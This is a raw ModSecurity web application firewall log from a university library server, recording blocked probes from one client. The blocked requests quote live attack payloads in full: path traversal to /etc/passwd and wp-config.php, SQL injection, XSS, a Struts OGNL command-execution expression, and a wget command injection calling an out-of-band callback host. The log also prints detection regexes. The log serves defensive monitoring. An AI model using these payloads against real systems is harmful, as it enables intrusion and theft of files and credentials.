[Tue Aug 29 11:48:49.387876 2023] [:error] [pid 2353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14scCo-f0AAAkxFywAAAAV"]
[Tue Aug 29 11:48:49.388600 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mosConfig_absolute_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:mosConfig_absolute_path: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/administrator/components/com_joomla-visites/core/include/myMailer.class.php"] [unique_id "ZO14scCo-f0AAAj12IwAAAAa"]
[Tue Aug 29 11:48:49.445741 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(6)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14scCo-f0AAAlV8CAAAAA1"]
[Tue Aug 29 11:48:50.494716 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:offset. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: IF(( found within ARGS:offset: 1;SELECT IF((SLEEP(16)),1,2356)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/sitemap.xml"] [unique_id "ZO14ssCo-f0AAAkGCY8AAAAE"]
[Tue Aug 29 11:48:52.379288 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tMCo-f0AAAlOZJsAAAAu"]
[Tue Aug 29 11:48:53.366273 2023] [:error] [pid 2437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-destination-id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-destination-id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO14tcCo-f0AAAmFnzMAAAAx"]
[Tue Aug 29 11:48:53.369067 2023] [:error] [pid 2428] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: /profile/../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/common/download/resource"] [unique_id "ZO14tcCo-f0AAAl8pQYAAAAm"]
[Tue Aug 29 11:48:54.432578 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:date: 2022-05-27' union select 1,2,3,md5('999999999'),5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO14tsCo-f0AAAlFH7YAAAAk"]
[Tue Aug 29 11:48:55.435763 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO14t8Co-f0AAAkle1UAAAAD"]
[Tue Aug 29 11:48:56.379879 2023] [:error] [pid 2382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sbFileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:sbFileName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jsp/help-sb-download.jsp"] [unique_id "ZO14uMCo-f0AAAlOZKAAAAAu"]
[Tue Aug 29 11:48:57.439068 2023] [:error] [pid 2438] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:path: ../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php/Home/uploadify/fileList"] [unique_id "ZO14ucCo-f0AAAmG@qcAAAAy"]
[Tue Aug 29 11:48:57.470536 2023] [:error] [pid 2389] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAlV8CwAAAA1"]
[Tue Aug 29 11:48:58.373834 2023] [:error] [pid 2363] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14usCo-f0AAAk7QLwAAAAi"]
[Tue Aug 29 11:48:58.391504 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAfWN9UAAAAL"]
[Tue Aug 29 11:48:59.410734 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAj12JoAAAAa"]
[Tue Aug 29 11:49:02.371291 2023] [:error] [pid 2348] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gkjjd9szy1p4ih.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAkskugAAAAN"]
[Tue Aug 29 11:49:04.452976 2023] [:error] [pid 2408] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAlo004AAAAJ"]
[Tue Aug 29 11:49:05.457096 2023] [:error] [pid 2341] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAkle14AAAAD"]
[Tue Aug 29 11:49:08.473530 2023] [:error] [pid 2346] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkqHvgAAAAM"]
[Tue Aug 29 11:49:09.480471 2023] [:error] [pid 2451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "perpustakaan.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmT6y0AAAAm"]
[Tue Aug 29 11:49:10.384883 2023] [:error] [pid 2404] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAlkwjYAAAAO"]
[Tue Aug 29 11:49:15.375574 2023] [:error] [pid 2451] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAmT6zYAAAAm"]
[Tue Aug 29 11:51:05.455173 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAlIBeIAAAAn"]
[Tue Aug 29 11:51:05.455218 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAl4sWwAAAAf"]
[Tue Aug 29 11:51:05.465301 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAfWOBQAAAAL"]
[Tue Aug 29 11:51:05.533386 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOBcAAAAL"]
[Tue Aug 29 11:51:05.817592 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBe8AAAAn"]
[Tue Aug 29 11:51:06.278216 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAfWOCEAAAAL"]
[Tue Aug 29 11:51:08.649199 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAfWOCoAAAAL"]
[Tue Aug 29 11:51:08.665101 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAnDFxsAAAAM"]
[Tue Aug 29 11:51:09.532970 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri 